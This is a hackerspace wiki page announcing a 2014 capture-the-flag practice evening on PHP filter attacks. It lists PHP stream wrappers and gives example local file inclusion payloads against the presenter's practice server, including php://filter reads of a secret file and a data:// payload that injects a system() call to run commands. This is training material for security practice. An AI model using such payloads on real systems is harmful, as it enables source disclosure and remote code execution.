CTF-practice-evening:2014-06-23

From Technologia Incognita

Revision as of 08:56, 21 May 2015 by Cool Fire (talk | contribs) (inserted a few spaces so crawlers don't hit these links and trip my IDS)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Jump to: navigation, search

CTF-practice-evening:2014-06-23
Date	2014/06/23
Time
Location	ACTA
Type	Workshop
Contact	Melanie

Contents

1 Capture The Flag evening - Part 20
2 General CTF Info
3 PHP Filter attacks
4 Enigma group PHP challenges

Capture The Flag evening - Part 20

23 June, 2014 - 7 PM
Please bring along a laptop with you!!!

General CTF Info

See the page for the Ctf-evenings
Link to the Tech Inc Challenge Website Scoreboard

PHP Filter attacks

Coolfire is providing the content for this evening! :-)
PHP commands:
- php://input
- output
- df
- memory
- temp
- filter

Example of LFI attacks:
- 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/read=string.toupper/resource=secret.php'
- 'php://filter LFI curl -X GET 'http://coolfire.insomnia247 .nl/20140623/index.php?page=php://filter/convert.base64-encode/resource=secret.php'
- http://coolfire.insomnia247 .nl/20140623/index.php?page=data:text/plain;charset=utf-8%,%C%3Fsystem%28%24_GET[%27]%29%3B%3F%3E&inject=ls%20-la
- ( expect:// )
- arrays: /index.php?page[]=A&page[]=B

Enigma group PHP challenges

http://www.enigmagroup.org/missions/basics/auditing/1/
- (You have to create an account, and login to access this page!)

Coolfire is using hackbar to supply the queries:
- https://addons.mozilla.org/en-US/firefox/addon/hackbar/

And Live HTTP Headers to view/manipulate the headers:
- https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

We solved challenges 1-11 together on the beamer! :-)

Retrieved from "https://wiki.techinc.nl/index.php?title=CTF-practice-evening:2014-06-23&oldid=15810"

Events